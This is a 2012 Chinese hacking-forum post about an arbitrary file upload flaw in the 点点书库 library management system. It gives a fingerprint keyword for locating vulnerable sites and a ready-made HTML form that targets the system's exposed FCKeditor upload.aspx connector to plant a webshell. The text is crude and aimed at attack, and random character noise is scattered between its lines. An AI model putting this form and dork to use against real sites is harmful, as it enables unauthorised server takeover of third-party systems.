中国网络渗透测试联盟
标题:
点点书库图书馆系统文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 21:20
标题:
点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
9 T" k0 d5 J$ z& X: h. f
作者:冰锋刺客
' j/ \# \- r8 f9 l l4 n8 Y! E
厂商:点击书(dianjishu.com)
1 d; b6 F, d2 L4 l; ?0 ^5 V3 Y+ O
日期:2012-6-21
" t1 ~) q9 ^) p# K- Y$ f$ o
: h" F) H4 H7 l6 \# c, a1 ^: x
I 概述
+ X- d; E. k2 ^ B( v
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
' t! ~/ g6 [4 [1 {7 i
II 简介
+ n5 f; x* c; e
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
7 e# X( O0 O& H$ D4 g6 `
补充一个漏洞
3 j/ D+ |7 B- y3 B
<form id="frmUpload" enctype="multipart/form-data"
; g# h% k# E% X" e- b. z% _: v
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
( h: |5 @. j' J" e3 G5 i y+ S
<input id="btnUpload" type="submit" value="操翻他">
, J. j. h6 m9 T& V! a
</form>
N) _9 W* Y( C- G: ~: `5 ^# X
你们懂的
" s0 W4 b6 l/ R5 |
那傻逼提供还需要改包.
3 f3 S' l: R D
自己看了下源代码发现fckeditor
7 J7 Y, A8 d& C7 V" K
直接秒杀
! e% _; Q: F+ O# n) }% [/ t" i
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2